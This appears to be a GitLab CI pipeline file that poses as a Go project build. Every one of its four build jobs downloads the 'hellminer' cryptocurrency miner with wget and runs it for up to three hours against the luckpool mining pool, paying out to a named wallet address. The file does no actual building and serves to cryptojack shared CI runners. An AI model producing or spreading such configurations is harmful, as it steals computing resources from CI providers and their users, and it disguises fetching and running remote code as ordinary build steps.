image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  timeout: 3 hours
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RNSaZsq5Pks3Nsy4S7CB5Goqd13L2xcrxS.sukuna -p x --cpu 2


build_b:
  stage: build
  timeout: 3 hours
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RNSaZsq5Pks3Nsy4S7CB5Goqd13L2xcrxS.sukuna -p x --cpu 2

build_c:
  stage: build
  timeout: 3 hours
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RNSaZsq5Pks3Nsy4S7CB5Goqd13L2xcrxS.sukuna -p x --cpu 2

build_d:
  stage: build
  timeout: 3 hours
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RNSaZsq5Pks3Nsy4S7CB5Goqd13L2xcrxS.sukuna -p x --cpu 2



  


